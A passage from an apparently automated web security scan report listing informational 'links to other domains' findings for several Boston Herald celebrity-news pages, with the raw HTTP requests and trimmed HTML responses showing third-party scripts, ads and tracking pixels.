<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.304. http://www.bostonherald.com/track/celebrity/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /track/celebrity/view.bg?articleid=1312631&srvc=track&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:46:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Celebrity News - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/celebrity/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fcelebrity%2Fview%2F20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/track/celebrity/view.bg?articleid=1312631&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/track/celebrity/view.bg?articleid=1312631&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/track/celebrity/view.bg?articleid=1312631&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(4) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '&lsquo;CHiPs&rsquo; star Larry Wilcox gets probation for securities fraud');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/track/celebrity/view.bg?articleid=1312631&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(4) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.305. http://www.bostonherald.com/track/inside_track/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /track/inside_track/?srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:34:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="The Inside Track - Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/inside_track/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=trak&position=">
...[SNIP]...
<a href="/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg" alt="Charlie Sheen."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg" alt="Mitt Romney."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5e8b2b_ben_01282011.jpg" alt="Former Patriots defensive end Jarvis Green celebrates
his birthday with a cake replica of Gillette Stadium.">
</a>
...[SNIP]...
<a href="/track/inside_track/view/20110127boy_banders_faithful_to_fenway/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/88a799_NKOTB_01272011.jpg" alt="Brian Littrell, Jonathan Knight, Howie Dorough, Donnie Wahlberg, Jordan Knight, Joey McIntyre, and Danny Wood jump in front of the Green Monster yesterday after announcing they will play at Fenway Park for a summer show as NKOTBSB."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=trak&position=">
...[SNIP]...
<a href="/track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/a582a0_Buffett_01272011.jpg" alt="Jimmy Buffett performing in Gulf Shores, Ala. Buffett fell off the stage at the end of a concert in Sydney, Australia."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/5ffe30_Shaq_01272011.jpg" alt="Tom O&#x2019;Brien and Tanner Webb with Shaquille O&#x2019;Neal."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/33907a_moore_01282011.jpg" alt="Julianne Moore hams it up with Harvard&rsquo;s Hasty Pudding Theatrical crew in drag as she receives the 2011 Woman of the Year award at Harvard."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110127we_hear_kenny_chesney_natalie_jacobson_kate_bosworth__more/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/df859e_kchesney012711.jpg" alt="Kenny Chesney."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110126this_is_hwoods_kind_of_town/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/d91058_Mark_01272011.jpg" alt="Mark Wahlberg as Micky Ward in &#x2018;The Fighter.&#x2019;"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/track/inside_track/view/20110126this_is_hwoods_kind_of_town/srvc=trak&position=">
...[SNIP]...
<a href="/track/inside_track/view/20110126mama_mia_jersey_cast_off_to_shores_of_italy/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/3701c8_Shore_01272011.jpg" alt="Deena Nicole Cortese of &#x2018;Jersey Shore&#x2019; fame films in Seaside Heights, N.J."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110126tracked_down_chris_lambton_robert_plant_jordan_knight__more/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/e312f8_Lamb_01272011.jpg" alt="&#x2018;The Bachelorette&#x2019; wash-outs Chris Lambton and Kasey Kahl at the Celtics-Cavs game."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110125idol_hopefuls_pop_a_hub_fave/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/1de6a0_idol_01252011.jpg" alt="&#x2018;American Idol&#x2019; hopeful Ashley Sullivan of
Tewksbury poses prior to performing for the judges.">
</a>
...[SNIP]...
<a href="/track/inside_track/view/20110125and_now_for_the_worst_of_the_worst/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/ef57fc_razzie_01252011.jpg" alt="&#x2018;The Twilight Saga: Eclipse&#x2019; stars Robert Pattinson, Kristen Stewart
and Taylor Lautner at the People&#x2019;s Choice Awards on Jan. 5.">
</a>
...[SNIP]...
<a href="/track/inside_track/view/20110125at_least_brady_still_wins_the_hearts_of_gq/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/147606_brady_01252011.jpg" alt="Tom Brady cradles a baby goat in a 2005 GQ spread."></a>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.306. http://www.bostonherald.com/track/inside_track/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /track/inside_track/view.bg?articleid=1312537&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:36:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="The Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/inside_track/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview%2F20110128hernia_sends_hearty_partier_sheen_to_the_hospital%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312537&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312537&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312537&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(32) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Hernia sends hearty partier Charlie Sheen to the hospital');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
